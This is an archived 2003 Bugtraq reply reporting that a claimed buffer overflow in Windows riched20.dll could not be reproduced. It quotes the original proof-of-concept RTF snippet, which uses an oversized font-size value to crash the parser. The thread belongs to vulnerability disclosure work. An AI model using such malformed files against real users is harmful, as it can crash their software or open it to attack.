Bugtraq mailing list archives
Re: Riched20.DLL attribute label buffer overflow vulnerability
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Tue, 18 Feb 2003 11:36:59 +0300
Dear Jie Dong,
Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.
--Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraq () securityfocus com:
JD> The following RTFfile may result in illegal operation :
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}} {\colortbl
JD> ;\red255\green0\blue255;} \viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121111111111111111111111111111111110000
JD> www.yoursft.com\fs20\par } "\fs" was used for setting the size of
--
~/ZARAZA
Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский)
Current thread:
- Riched20.DLL attribute label buffer overflow vulnerability Jie Dong (Feb 17)
- Re: Riched20.DLL attribute label buffer overflow vulnerability Thor Larholm (Feb 21)
- Re: Riched20.DLL attribute label buffer overflow vulnerability Raistlin (Feb 24)
- <Possible follow-ups>
- Re: Riched20.DLL attribute label buffer overflow vulnerability 3APA3A (Feb 18)
- Re: Riched20.DLL attribute label buffer overflow vulnerability Marc Ruef (Feb 25)
- Re: Riched20.DLL attribute label buffer overflow vulnerability Thor Larholm (Feb 21)